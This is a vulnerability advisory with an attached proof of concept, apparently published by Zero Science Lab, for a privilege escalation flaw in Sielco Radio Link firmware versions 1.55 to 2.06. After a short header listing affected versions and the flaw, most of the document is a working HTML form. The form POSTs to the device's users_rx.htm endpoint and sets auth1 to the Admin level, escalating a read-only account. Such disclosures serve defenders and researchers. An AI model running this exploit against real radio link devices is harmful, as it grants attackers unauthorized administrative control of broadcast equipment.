<!-- Sielco Radio Link 2.06 Remote Privilege Escalation Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: 2.06 (RTX19) 2.05 (RTX19) 2.00 (EXC19) 1.60 (RTX19) 1.59 (RTX19) 1.55 (EXC19) Summary: Sielco develops and produces radio links for all transmission and reception needs, thanks to innovative units and excellent performances, accompanied by a high reliability and low consumption. Desc: The application suffers from a privilege escalation vulnerability. A user with Read permissions can elevate his/her privileges by sending a HTTP POST request setting the parameter 'auth1' or 'auth2' or 'auth3' to integer value '1' for Write or '2' for Admin permissions. Tested on: lwIP/2.1.1 Web/2.9.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5759 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5759.php 26.01.2023 --> <html> <body> <form action="http://radiolink/protect/users_rx.htm" method="POST"> <input type="hidden" name="pwd0" value="" /> <input type="hidden" name="pwd0bis" value="" /> <input type="hidden" name="user1" value="testingus" /> <input type="hidden" name="pwd1" value="" /> <input type="hidden" name="pwd1bis" value="" /> <input type="hidden" name="auth1" value="2" /> <input type="hidden" name="user2" value="" /> <input type="hidden" name="pwd2" value="" /> <input type="hidden" name="pwd2bis" value="" /> <input type="hidden" name="auth2" value="0" /> <input type="hidden" name="user3" value="" /> <input type="hidden" name="pwd3" value="" /> <input type="hidden" name="pwd3bis" value="" /> <input type="hidden" name="auth3" value="0" /> <input type="submit" value="Escalate" /> </form> </body> </html>